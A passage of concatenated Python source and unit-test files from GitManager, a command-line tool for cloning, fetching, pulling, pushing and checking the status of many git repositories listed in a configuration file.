self.insert_base_or_get(parent)
else:
parent = None
# else, we need to insert top-level
else:
parent = None
# and finally create our base
return self.insert_at(parent, b)
def insert_repo_or_get(self, r: desc.RepositoryDescription) -> int:
""" Gets a RepositoryDescription index or inserts it recursively """
# inserting an already existing repo
index = self.index(r)
if index is not None:
return index
# else, we need to create the parent
# unless it is the base
(parent, _) = r.to_repo_line("", "", "")
if parent.folder == self.__base_directory:
parent = None
else:
self.insert_base_or_get(parent)
# and then insert it
return self.insert_at(parent, r)
def rebuild(self):
""" Rebuilds this configuration file by re-inserting all
repository descriptions from scratch """
# get all the repository descriptions
repos = list(self.repositories)
# wipe all the lines
self.lines = []
# if the root is not the base directory, insert it.
if self.root != self.__base_directory:
relroot = os.path.relpath(self.root, self.__base_directory)
if relroot.startswith('..'):
relroot = self.root
self.lines.append(line.RootLine('', '', relroot, ''))
# and re-insert all of the repos
for r in repos:
self.insert_repo_or_get(r)
def remove_local(self, local: impl.LocalRepository) -> bool:
""" Remove a local repository from a configuration file
provided it exists """
index = None
# search for the local repository
for (i, dd) in self.descriptions:
if isinstance(dd, desc.RepositoryDescription) and \
dd.local == local:
index = i
break
# if we did not find it, return
if index is None:
return False
# and remove the given index
lines = self.lines
del self.lines[index]
self.lines = lines
return True
def find(self, pattern) -> typing.Generator[desc.Description, None, None]:
""" Finds all repositories subject to a given description. """
for r in self.repositories:
if r.remote.matches(pattern):
yield r
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import argparse
from GitManager.utils import format
from GitManager.config import file
from GitManager.commands import status, lister, fetch, setup, pull, state, \
push, reconfigure, gc, clone
def main(args):
""" The main entry point for git-manager"""
try:
real_main(args)
except BrokenPipeError:
return 2
except KeyboardInterrupt:
print("\n{}".format(
format.Format.red("Received KeyboardInterrupt")
))
return 2
except Exception as e:
print("\n{}".format(
format.Format.red("Unknown error: {}".format(e))
))
return 3
def real_main(args):
""" Main entry point for the program -- may throw errors"""
ACTIONS = ['help', 'setup', 'clone', 'fetch', 'pull', 'push', 'gc', 'ls',
'status', 'state', 'reconfigure']
# Create an argument parser
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("action", nargs='?',
help="Action to perform. One of '{}'. ".format(
"', '".join(ACTIONS)))
args, command_args = parser.parse_known_args()
# Find the configuration file
cfg_file = file.File.find()
# Check that we have a configuration file.
if cfg_file is None:
print(format.Format.red("Missing configuration file. "))
return 1
# read the list of repositories
config = file.File(cfg_file)
try:
config.read()
except:
print(format.Format.red("Unable to read configuration file. "))
return 1
line = format.TerminalLine()
repos = list(config.repositories)
if args.action == 'help' or args.action is None:
parser.print_help()
elif args.action == 'setup':
setup.Setup(line, repos, *command_args)()
elif args.action == 'clone':
clone.Clone(line, config, *command_args)()
elif args.action == 'fetch':
fetch.Fetch(line, repos, *command_args)()
elif args.action == 'pull':
pull.Pull(line, repos, *command_args)()
elif args.action == 'push':
push.Push(line, repos, *command_args)()
elif args.action == 'gc':
gc.GC(line, repos, *command_args)()
elif args.action == 'ls':
lister.LsLocal(line, repos, *command_args)()
elif args.action == 'status':
status.Status(line, repos, *command_args)()
elif args.action == 'state':
state.State(line, repos, *command_args)()
elif args.action == 'reconfigure':
import sys
line = format.TerminalLine(fd=sys.stderr)
reconfigure.Reconfigure(line, config, *command_args)()
else:
print('Unknown command %r' % (args.action,))
return 1
return 0
__all__ = ["main"]
--- FILE SEPARATOR ---
import collections
import os
import typing
from . import implementation
from ..config import line
from abc import ABCMeta
class Description(metaclass=ABCMeta):
""" A Base class for descriptions"""
pass
@Description.register
class BaseDescription(collections.namedtuple("BaseDescription", ["folder"])):
""" A 'description' of a base folder in the configuration file. """
pass
@Description.register
class RepositoryDescription(collections.namedtuple("RepositoryDescription",
["source", "path"])):
"""A 'description' of a repository in the configuration file, i.e. a
a pair of (source, path) """
@property
def local(self) -> implementation.LocalRepository:
""" Gets the local repository associated to this
RepositoryDescription """
return implementation.LocalRepository(self.path)
@property
def remote(self) -> implementation.RemoteRepository:
""" Gets the remote repository associated to this
RepositoryDescription """
return implementation.RemoteRepository(self.source)
def to_repo_line(self, indent: str, space_1: str, space_2: str) -> \
typing.Tuple[BaseDescription, line.RepoLine]:
""" Turns this RepositoryDescription into an appropriate RepoLine
and description. """
# get the base name and git clone name
(base, name) = os.path.split(self.path)
git_name = self.remote.humanish_part()
# if the git name is identical to the already existing name, we just
# give the source
if name == git_name:
return BaseDescription(base), line.RepoLine(indent, self.source,
'', '', space_2)
# else we need to give both
else:
return BaseDescription(base), line.RepoLine(indent, self.source,
space_1, name, space_2)
--- FILE SEPARATOR ---
import typing
from . import description, implementation
import os.path
class Finder(object):
""" Class that helps finding existing repositories """
@staticmethod
def find_recursive(path: str,
allow_links: bool=False,
continue_in_repository: bool=False,
callback:
typing.Callable[[str], None]=lambda s: None) \
-> typing.Generator[description.RepositoryDescription, None, None]:
""" Finds all repositories within a specific path
:param path: Paths of repository to find
:param allow_links: If True, continue searching in repositories even if
they are symlinked. Use with caution, as this might cause the
routine to run into a infinite loop
:param continue_in_repository: If True, instead of stopping the
recursing inside a repository, continue searching for sub-repositories
:param callback: Optional callback to call when scanning a given
directory.
"""
# notify the caller that we are scanning path
callback(path)
# boolean indicating if we are inside a repository
is_in_repo = False
# if we do not allow links, stop when we have a link
if not allow_links and os.path.islink(path):
return
# return the repository if available
try:
yield Finder.get_from_path(path)
is_in_repo = True
except ValueError:
pass
# if we got a repository, no need to continue iterating
if is_in_repo and not continue_in_repository:
return
# iterate over all sub-items
for name in os.listdir(path):
# if we have a sub-directory
dpath = os.path.join(path, name)
if os.path.isdir(dpath):
# iterate over the return items
for desc in Finder.find_recursive(
dpath,
allow_links=allow_links,
continue_in_repository=continue_in_repository,
callback=callback):
yield desc
@staticmethod
def get_from_path(path: str) -> description.RepositoryDescription:
""" Gets a single repository given a path if it exists
:param path: Path to find repository at
"""
# take the local repository
local = implementation.LocalRepository(path)
# if it doesn't exist, break
if not local.exists():
raise ValueError("No repository available in {}".format(path))
# find the remote url -- try origin first
try:
remote_url = local.get_remote_url('origin')
except ValueError:
remotes = local.remotes
if len(remotes) == 0:
raise ValueError('No remotes available')
# otherwise take the first remote
remote_url = local.get_remote_url(remotes[0])
# now we can be sure, the remote exists
# so we can return the description
return description.RepositoryDescription(remote_url, path)
--- FILE SEPARATOR ---
import os
import re
import enum
import typing
import fnmatch
from ..utils import run
class RemoteStatus(enum.Enum):
""" Remote uplink status"""
UP_TO_DATE = "ok"
REMOTE_NEWER = "pull"
LOCAL_NEWER = "push"
DIVERGENCE = "divergence"
class LocalRepository(object):
""" Represents a local repository identified by a path """
def __init__(self, path: str):
""" Creates a new LocalRepository """
self.__path = os.path.normpath(path)
def __eq__(self, other: typing.Any) -> bool:
""" Checks if this LocalRepository is equal to another"""
return isinstance(other, LocalRepository) and other.path == self.path
@property
def remotes(self) -> typing.List[str]:
""" A list of remotes that this RemoteRepository has """
remotes = run.GitRun("remote", "show", "-n", cwd=self.path)
remotes.wait()
return remotes.stdout.read().decode("utf-8").split("\n")
def get_remote_url(self, name: str) -> str:
""" Get the url of a remote """
# get the url of a remote
remote_url = run.GitRun("remote", "get-url", name, cwd=self.path)
# throw an exeception if we fail
if not remote_url.success:
raise ValueError("Unable to find remote {}".format(name))
# else return the url
return remote_url.stdout.read().decode("utf-8").split("\n")[0]
@property
def path(self) -> str:
""" The path to this repository """
return self.__path
def upstream_ref(self, ref: str) -> str:
""" Gets the upstream being tracked by a given path
:param ref: Ref to get upstream of.
"""
refs = run.GitRun("for-each-ref", "--format=%(upstream:short)", ref,
cwd=self.path)
refs.wait()
return refs.stdout.read().decode("utf-8").split("\n")[0]
def symbolic_ref(self, ref: str) -> str:
""" Gets the symbolic ref REF is pointing to
:param ref: Ref to parse
"""
refs = run.GitRun("symbolic-ref", "-q", ref, cwd=self.path)
refs.wait()
return refs.stdout.read().decode("utf-8").split("\n")[0]
def ref_parse(self, ref: str) -> str:
""" Normalises a ref by parsing it in a short form
:param ref: Ref to parse
"""
refs = run.GitRun("rev-parse", ref, cwd=self.path)
refs.wait()
return refs.stdout.read().decode("utf-8").split("\n")[0]
def __str__(self) -> str:
return self.path
def __repr__(self):
return "<{} {}>".format(self.__class__.__name__, str(self))
def exists(self) -> bool:
""" Checks if this repository exists """
# check if the directory exists
if not os.path.isdir(self.path):
return False
# try to get the toplevel
rev_parse_run = run.GitRun("rev-parse", "--show-toplevel",
cwd=self.path)
# if we did not succeed, we are not inside a git repo
if not rev_parse_run.success:
return False
# get the actual toplevel
toplevel = rev_parse_run.stdout.read().decode("utf-8").split("\n")[0]
# and check that it is equal to the normal path
return os.path.normpath(toplevel) == self.path
def gc(self, *args: str) -> bool:
""" Runs housekeeping tasks on this repository
:param args: Arguments to pass along to the houskeeping command
"""
return run.GitRun("gc", *args, cwd=self.path, pipe_stderr=True,
pipe_stdin=True, pipe_stdout=True).success
def fetch(self) -> bool:
""" Fetches all remotes from this repository"""
return run.GitRun("fetch", "--all", "--quiet", cwd=self.path,
pipe_stdin=True, pipe_stdout=True,
pipe_stderr=True).success
def pull(self) -> bool:
""" Pulls all remotes from this repository"""
return run.GitRun("pull", cwd=self.path, pipe_stdin=True,
pipe_stdout=True, pipe_stderr=True).success
def push(self) -> bool:
""" Pushes this repository """
return run.GitRun("push", cwd=self.path, pipe_stdin=True,
pipe_stdout=True, pipe_stderr=True).success
def local_status(self) -> typing.Optional[str]:
""" Shows status on this git repository
"""
if not self.exists():
return None
# Check for the status first
cmd = run.GitRun("status", "--porcelain", cwd=self.path)
cmd.wait()
# return the porcelain info
return cmd.stdout.read().decode("utf-8")
def remote_status(self, update=False) -> typing.Optional[RemoteStatus]:
""" Shows status on this repository, and in particular if it i
out-of-date with the remote
:param update: Boolean indicating if we should update using git
remote update first
"""
# if we do not exist, return
if not self.exists():
return None
# if we should update, run git remote update
if update:
if not run.GitRun("remote", "update", cwd=self.path).success:
return None
# where is head pointing to?
localref = self.ref_parse("HEAD")
# what is our upstream?
upstream = self.upstream_ref(self.symbolic_ref("HEAD"))
remoteref = self.ref_parse(upstream)
# check where we would merge
refs = run.GitRun("merge-base", localref, remoteref, cwd=self.path)
refs.wait()
baseref = refs.stdout.read().decode("utf-8").split("\n")[0]
# if both references are identical, we are ok
if localref == remoteref:
return RemoteStatus.UP_TO_DATE
# if we would start with the local base, we would have to pull
elif localref == baseref:
return RemoteStatus.REMOTE_NEWER
# if we would start with the remote base, we would have to push
elif remoteref == baseref:
return RemoteStatus.LOCAL_NEWER
# else we have divergence and something is wrong.
else:
return RemoteStatus.DIVERGENCE
class RemoteRepository(object):
""" Represents a remote repository identified by a url """
def __init__(self, url: str):
""" creates a new RemoteRepository()
:param url: URL to remote repository
"""
self.__url = url
def __eq__(self, other: typing.Any) -> bool:
""" Checks if this LocalRepository is equal to another"""
return isinstance(other, RemoteRepository) and other.url == self.url
@property
def url(self) -> str:
""" the url to this repository """
return self.__url
def __str__(self) -> str:
return self.url
def __repr__(self):
return "<{} {}>".format(self.__class__.__name__, str(self))
def exists(self) -> bool:
""" Checks if this remote repository exists """
return run.GitRun("ls-remote", "--exit-code", self.url).success
def clone(self, local: LocalRepository, *args: typing.Tuple[str]) -> bool:
""" Clones this repository into the path given by a local path"""
return run.GitRun("clone", self.url, local.path, *args,
pipe_stdin=True, pipe_stdout=True,
pipe_stderr=True).success
def components(self) -> typing.List[str]:
"""
Extracts the components of this URL, i.e. a set of items that uniquely
identifies where this repository should go.
"""
# Trim a trailing '.git'
if self.url.endswith('.git'):
url = self.url[:-4]
else:
url = self.url
# Trim trailing '/'s
while url.endswith('/'):
url = url[:-1]
if '://' in url:
# [$PROTOCOL]:$PREFIX/$COMPONENTS
url = '://'.join(url.split('://')[1:])
parts = re.split(r"[\\/:]", url)
(prefix, rest) = (parts[0], '/'.join(parts[1:]))
else:
# $PREFIX:$COMPONENTS
parts = url.split(':')
(prefix, rest) = (parts[0], ':'.join(parts[1:]))
# read (user, host) from the prefix
if '@' in prefix:
parts = prefix.split('@')
(user, host) = (parts[0], '@'.join(parts[1:]))
else:
user = None
host = prefix
# if user is 'git' or 'gogs', ignore it
if user in ['git', 'gogs']:
user = None
# prepare to prepend prefix
if user is not None:
prefix = [host, user]
else:
prefix = [host]
# and split into '/'s
return prefix + re.split(r"[\\/:]", rest)
def matches(self, pattern: str) -> bool:
""" Checks if a repository matches a given pattern"""
# lowercase the pattern
pattern = pattern.lower()
# split the pattern into components
if ':' in pattern:
pattern_components = RemoteRepository(pattern).components()
else:
pattern = ':' + pattern
pattern_components = RemoteRepository(pattern).components()[1:]
# count and reassemble
pattern_length = len(pattern_components)
pattern = '/'.join(pattern_components)
# get the components of the current repo
components = list(map(lambda pc: pc.lower(), self.components()))
components_length = len(components)
# iterate over all sub-paths of the given length
for i in range(components_length - pattern_length + 1):
suburl = '/'.join(components[i:i + pattern_length])
if fnmatch.fnmatch(suburl, pattern):
return True
return False
def humanish_part(self) -> str:
"""
Extracts the 'humanish' part of this URL. See the `man git-clone`
for more details.
"""
return self.components()[-1]
--- FILE SEPARATOR ---
import shutil
import sys
from os import path
class Format(object):
""" Methods for formatting text in certain colors. """
def __init__(self):
""" Prevents creation of Format(). """
raise TypeError("Format() can not be instantiated")
@staticmethod
def red(prt: str) -> str:
""" Formats a string in red. """
return "\033[91m{}\033[00m".format(prt)
@staticmethod
def yellow(prt: str) -> str:
""" Formats a string in yellow. """
return "\033[93m{}\033[00m".format(prt)
@staticmethod
def green(prt: str) -> str:
""" Formats a string in green. """
return "\033[92m{}\033[00m".format(prt)
@staticmethod
def cyan(prt: str) -> str:
""" Formats a string in cyan. """
return "\033[96m{}\033[00m".format(prt)
@staticmethod
def short_abs_path(pth: str, length: int) -> str:
""" Formats an absolute path with a maximum length
:param pth: Absolute path to format
:param length: Maximal length of the path (at least 6)
"""
# too small length
if length <= 5:
raise ValueError('Length must be at least 6')
# check that we have an absolute path
if not pth.startswith('/'):
raise ValueError('pth must be an absolute path')
#
# Step 1: Normalise the path
#
pth = path.normpath(pth)
if len(pth) < length:
return pth
#
# Step 2: If inside $HOME, use a relative path instead of an
# absolute one
#
# find the path relative to the $HOME directory of the user
relative_path = path.relpath(pth, path.expanduser('~'))
# if we are inside the home directory, use that instead
if relative_path.startswith('./') or relative_path.startswith(
'../') \
or relative_path == '.' or relative_path == '..':
prefix = '/'
pth = pth[1:]
else:
prefix = '~/'
pth = relative_path
#
# Step 3: Format a short path
#
return prefix + Format.short_rel_path(pth, length - len(prefix))
@staticmethod
def short_rel_path(pth: str, length: int) -> str:
""" Formats a relative path with a maximum length
:param pth: Relative path to format
:param length: Maximal length of the path (at least 4)
"""
# too small length
if length <= 3:
raise ValueError('Length must be at least 4')
# check that we have a relative path
if pth.startswith('/'):
raise ValueError('pth must be a relative path')
#
# Step 1: Normalise the path
#
pth = path.normpath(pth)
if len(pth) <= length:
return pth
#
# Step 2: Iteratively try replacing components by '...'
#
pth_components = pth.split('/')
# try shortening components
while len(pth_components) > 2:
# if the long path is ok, just return it
if len(pth) <= length:
return pth
# figure out the component to remove
rmidx = int(len(pth_components) / 2)
# build a new path
pth = '/'.join(pth_components[:rmidx] + ['...'] + pth_components[
(rmidx + 1):])
# and update the components array
pth_components = pth_components[:rmidx] + pth_components[
(rmidx + 1):]
#
# Step 3: Fallback to just taking a substring
#
# if the long path is ok now, just return it
if len(pth) <= length:
return pth
# if we still haven't gotten a path that is short enough
# we will have to remove parts from within one component
# extract first and last component
begin = pth_components[0]
end = pth_components[1]
# the number of characters we will get to keep
keepidx = length - 3
# shorten the longer component, as it likely is accurate enough
# even without the extra information
if len(begin) < len(end):
return pth[:keepidx] + '...'
else:
return '...' + pth[-keepidx:]
@staticmethod
def short_path(pth: str, length: int) -> str:
""" Formats a path with a maximum length
If pth is known to be absolute or non-absolute use short_abs_path() or
short_rel_path() instead.
:param pth: Path to format
:param length: Maximal length of the path (at least 6)
"""
# too small length
if length <= 5:
raise ValueError('Length must be at least 6')
if pth.startswith('/'):
return Format.short_abs_path(pth, length)
else:
return Format.short_rel_path(pth, length)
class TerminalLine(object):
""" Represents a Terminal Line that can be re-written"""
def __init__(self, fd=None):
""" Creates a new TerminalLine object.
:param fd: File descriptor of output to use
"""
self.__fd = sys.stdout if fd is None else fd
self.__cache = ""
@property
def width(self):
"""
:return: the width of this line in number of characters
:rtype: int
"""
return shutil.get_terminal_size().columns
def clean(self):
""" Cleans the current line of content.
:return:
"""
if self.__fd.isatty():
self.append('\r%s\r' % (' ' * self.width))
else:
self.__cache = ""
def linebreak(self):
""" Inserts a LineBreak into this line.
"""
self.append('\n')
def write(self, s: str):
""" Writes a string to this Line, overwriting the current content.
:param s: String to write to the line.
:type s: str
"""
self.clean()
self.append(s)
def append(self, s: str):
""" Appends text to this TermminalLine instance. """
# either write it out directly
if self.__fd.isatty():
self.__fd.write(s)
else:
self.__cache += s
# and flush the content
self.flush()
def flush(self):
"""Flushes this TerminalLine. """
# if we are not a terminal, we flush existing lines
if not self.__fd.isatty():
while "\n" in self.__cache:
idx = self.__cache.index('\n')
self.__fd.write(self.__cache[:idx + 1])
self.__cache = self.__cache[idx + 1:]
# call the underlying flush implementation
self.__fd.flush()
__all__ = ["Format", "TerminalLine"]
--- FILE SEPARATOR ---
import typing
import enum
import subprocess
import os
class ProcessRunState(enum.Enum):
""" Different process run states """
NEW = 'new'
ACTIVE = 'active'
TERMINATED = 'terminated'
class ProcessRun(object):
""" Represents a single call to an external Executable """
def __init__(self, exe: str, *args: typing.List[str],
cwd: typing.Optional[str] = None, pipe_stdout: bool = False,
pipe_stderr: bool = False, pipe_stdin: bool = False,
environment: typing.Optional[dict] = None):
"""
:param exe: Executable or command to run
:param args: Arguments to the git call
:param cwd: Working directory of the git call. Defaults to the
current working directory
:param pipe_stdout: should we pipe stdout to the parent?
:param pipe_stderr: should we pipe stderr to the parent?
:param pipe_stdin: should we pipe stdin from the parent?
:param environment: The environment of this process or None if it
should be inherited from the parent
"""
self.__exe = exe
self.__args = list(args)
self.__cwd = cwd if cwd is not None else os.getcwd()
self.__pipe_stdout = pipe_stdout
self.__pipe_stdin = pipe_stdin
self.__pipe_stderr = pipe_stderr
self.__environment = environment if environment is not None else \
os.environ.copy()
# Has the process been started?
self.__started = False
# The Popen handle of the process
self.__handle = None # type: subprocess.Popen
#
# PROPERTIES
#
@property
def exe(self) -> str:
""" Command (executable) to run in this process run """
# TODO: Do we want to have a which() here?
return self.__exe
@property
def args(self) -> typing.List[str]:
""" arguments given to this Git command """
return self.__args
@property
def cwd(self) -> str:
""" working directory of the GitRun() """
return self.__cwd
@property
def environment(self) -> dict:
""" environment of this process """
return self.__environment
#
# INPUT / OUTPUT
#
@property
def pipe_stdout(self) -> bool:
""" should we pipe stdout to the parent? """
return self.__pipe_stdout
@property
def stdout(self) -> typing.Optional[typing.IO[bytes]]:
""" the stdout handle of the process or None """
# we need to run the process first
if self.state == ProcessRunState.NEW:
raise ProcessRunStateError('ProcessRun() is not running')
# if we are not piping stdout to the parent, return it
if not self.pipe_stdout:
return self.__handle.stdout
# else we return None
else:
return None
@property
def pipe_stderr(self) -> bool:
""" should we pipe stderr to the parent? """
return self.__pipe_stderr
@property
def stderr(self) -> typing.Optional[typing.IO[bytes]]:
""" the stderr handle of the process or None """
# we need to run the process first
if self.state == ProcessRunState.NEW:
raise ProcessRunStateError('ProcessRun() is not running')
# if we are piping stdout, we return it
if not self.pipe_stderr:
return self.__handle.stderr
# else we return None
else:
return None
@property
def pipe_stdin(self) -> bool:
""" should we pipe stdin to the parent? """
return self.__pipe_stdin
@property
def stdin(self) -> typing.Optional[typing.IO[bytes]]:
""" the stdin handle of the process or None """
# we need to run the process first
if self.state == ProcessRunState.NEW:
raise ProcessRunStateError('ProcessRun() is not running')
# if we are piping stdout, we return it
if not self.pipe_stdin:
return self.__handle.stdin
# else we return None
else:
return None
@property
def returncode(self) -> int:
""" the returncode of this process (blocking) """
# if we we are not yet finished, wait
if self.state != ProcessRunState.TERMINATED:
self.wait()
return self.__handle.returncode
@property
def success(self) -> bool:
""" success of this process, i.e. if its returncode was 0 """
return self.returncode == 0
#
# STATE
#
@property
def state(self) -> ProcessRunState:
"""
The current state of the process -- has it been started, finished,
etc.
:return: one of 'ready', 'running', 'finished'
"""
# we have not been started yet
if not self.__started:
return ProcessRunState.NEW
# Poll to check if we have finished
self.__handle.poll()
# still running
if self.__handle.returncode is None:
return ProcessRunState.ACTIVE
# else return finished
else:
return ProcessRunState.TERMINATED
def run(self):
""" Runs this process """
# check that we have not yet been started
if self.state != ProcessRunState.NEW:
raise ProcessRunStateError(
'ProcessRun() was already started, can not run it again. ')
# Set the output arguments correctly
stdout = None if self.pipe_stdout else subprocess.PIPE
stderr = None if self.pipe_stderr else subprocess.PIPE
stdin = None if self.pipe_stdin else subprocess.PIPE
# We are now running
self.__started = True
# Make the arguments ready
self.__handle = subprocess.Popen([self.exe] + self.args, cwd=self.cwd,
stdout=stdout, stderr=stderr,
stdin=stdin, env=self.environment)
def wait(self, timeout: typing.Optional[int] = None):
""" waits for this process to finish
:param timeout: Optional timeout to wait for
"""
# we are not yet running, so start it
if self.state == ProcessRunState.NEW:
self.run()
# and wait for the process
self.__handle.wait(timeout=timeout)
def kill(self):
""" kills this process """
# we can only kill a running process
if self.state != ProcessRunState.ACTIVE:
raise ProcessRunStateError('can only kill running process')
self.__handle.kill()
class GitRun(ProcessRun):
def __init__(self, *args: str,
cwd: typing.Optional[str] = None, pipe_stdout: bool = False,
pipe_stderr: bool = False, pipe_stdin: bool = False,
environment: typing.Optional[dict] = None):
"""
:param args: Arguments to the git call
:param cwd: Working directory of the git call. Defaults to the
current working directory
:param pipe_stdout: should we pipe stdout to the parent?
:param pipe_stderr: should we pipe stderr to the parent?
:param pipe_stdin: should we pipe stdin from the parent?
:param environment: The environment of this process or None if it
should be inherited from the parent
"""
super().__init__("git", *args, cwd=cwd, pipe_stdout=pipe_stdout,
pipe_stderr=pipe_stderr, pipe_stdin=pipe_stdin,
environment=environment)
class ProcessRunStateError(Exception):
""" An error in the state of the ProcessRun """
pass
--- FILE SEPARATOR ---
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="git_manager",
version="0.2.0",
url="https://github.com/tkw1536/GitManager",
author="Tom Wiesing",
author_email="tkw01536@gmail.com",
packages=find_packages(),
scripts=['git-manager'],
description="Manages multiple git repositories",
long_description=read('README.rst'),
license="MIT",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Topic :: Utilities",
]
)
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager import commands
from GitManager.utils import format
from GitManager.repo import description
class TestCommand(unittest.TestCase):
""" Tests that the command line works properly """
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository.exists',
side_effect=[True, False])
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
@unittest.mock.patch('GitManager.commands.Command.parse')
def test_repos(self, command_parse: unittest.mock.Mock,
format_TerminalLine: unittest.mock.Mock,
implementation_exists: unittest.mock.Mock):
""" Tests that the list of repos works properly """
line = format.TerminalLine()
repos = [
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/other/source', '/path/to/other/clone')
]
# create a command object
cmd = commands.Command(line, repos)
# if we have a local command, only show the existing one
with unittest.mock.patch('GitManager.commands.Command.LOCAL',
True):
self.assertEqual(cmd.repos, repos[0:1])
# if we do not have a local command, show all
with unittest.mock.patch('GitManager.commands.Command.LOCAL',
False):
self.assertEqual(cmd.repos, repos)
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
@unittest.mock.patch('GitManager.commands.Command.parse')
def test_args(self, command_parse: unittest.mock.Mock,
format_TerminalLine: unittest.mock.Mock):
""" Checks that the args property is implemented properly"""
line = format.TerminalLine()
repos = []
# create a command object
cmd = commands.Command(line, repos, "1", "2", "3")
command_parse.assert_called_with("1", "2", "3")
self.assertEqual(cmd.args, command_parse.return_value)
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
@unittest.mock.patch('GitManager.commands.Command.parse')
def test_run(self, command_parse: unittest.mock.Mock,
format_TerminalLine: unittest.mock.Mock):
""" Tests that the run() method is not implemented. """
# create a magic line object
line = format.TerminalLine()
repos = []
# create a command object
cmd = commands.Command(line, repos)
# and make sure it throws an error:
with self.assertRaises(NotImplementedError):
cmd.run(description.RepositoryDescription('/path/to/source',
'/path/to/clone'))
@unittest.mock.patch('builtins.print')
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
@unittest.mock.patch('GitManager.commands.Command.parse')
def test_write(self, command_parse: unittest.mock.Mock,
format_TerminalLine: unittest.mock.Mock,
builtins_print: unittest.mock.Mock):
""" Tests that the write function works properly. """
line = format.TerminalLine()
repos = []
# create a command object
cmd = commands.Command(line, repos)
# write hello world
cmd.write("Hello world")
# assert that the right calls have been made
format_TerminalLine.return_value.linebreak.assert_called_with()
builtins_print.assert_called_with("Hello world")
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
@unittest.mock.patch('GitManager.commands.Command.parse')
def test_write_with_counter(self, command_parse: unittest.mock.Mock,
format_TerminalLine: unittest.mock.Mock):
""" Tests that the write_with_counter function works correctly"""
format_TerminalLine.return_value.width = 100
line = format.TerminalLine()
repos = [
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone')
]
# create a command object
cmd = commands.Command(line, repos)
cmd._Command__idx = 2
cmd.write_with_counter('SOME TEXT')
format_TerminalLine.return_value.write \
.assert_called_with("[03/11] SOME TEXT")
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
@unittest.mock.patch('GitManager.commands.Command.parse')
def test_write_path_with_counter(self,
command_parse: unittest.mock.Mock,
format_TerminalLine: unittest.mock.Mock):
""" Tests that the write_with_counter function works correctly"""
format_TerminalLine.return_value.width = 21
line = format.TerminalLine()
repos = [
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone')
]
# create a command object
cmd = commands.Command(line, repos)
cmd._Command__idx = 2
cmd.write_path_with_counter('/path/to/clone')
format_TerminalLine.return_value.write \
.assert_called_with("[03/11] /path/.../...")
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
@unittest.mock.patch('GitManager.commands.Command.write_path_with_counter')
@unittest.mock.patch('GitManager.commands.Command.run', return_value=True)
@unittest.mock.patch('GitManager.commands.Command.parse')
def test_call(self,
command_parse: unittest.mock.Mock,
command_run: unittest.mock.Mock,
command_write_path_with_counter: unittest.mock.Mock,
format_TerminalLine: unittest.mock.Mock):
""" Tests that the call() function works correctly """
format_TerminalLine.return_value.width = 21
line = format.TerminalLine()
repos = [
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/1'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/2'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/3'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/4'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/5'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/6'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/7'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/8'),
description.RepositoryDescription(
'/path/to/source', '/path/to/clone/9')
]
expected = list(map(lambda d: d.local.path, repos))
# create a command object
cmd = commands.Command(line, repos)
# a non-plain command
with unittest.mock.patch('GitManager.commands.Command.PLAIN',
False):
# run the command
self.assertEqual(cmd(), len(expected))
# each of the commands should have been called
for (e, r) in zip(expected, repos):
command_write_path_with_counter.assert_any_call(e)
command_run.assert_any_call(r)
# it should have been cleaned afterwards
format_TerminalLine.return_value.clean.assert_called_with()
# reset all the mocks
command_run.reset_mock()
command_write_path_with_counter.reset_mock()
format_TerminalLine.reset_mock()
# a plain command
with unittest.mock.patch('GitManager.commands.Command.PLAIN',
True):
# run the command
self.assertEqual(cmd(), len(expected))
# assert that no path has been printed
command_write_path_with_counter.assert_not_called()
# each of the commands should have been called
for r in repos:
command_run.assert_any_call(r)
# it should have been cleaned afterwards
format_TerminalLine.return_value.clean.assert_called_with()
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import fetch
from GitManager.repo import description
from GitManager.utils import format
class TestFetch(unittest.TestCase):
""" Tests that the fetch command works properly """
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository')
def test_run(self,
implementation_LocalRepository: unittest.mock.Mock):
# create a repository
repo = description.RepositoryDescription('/path/to/source',
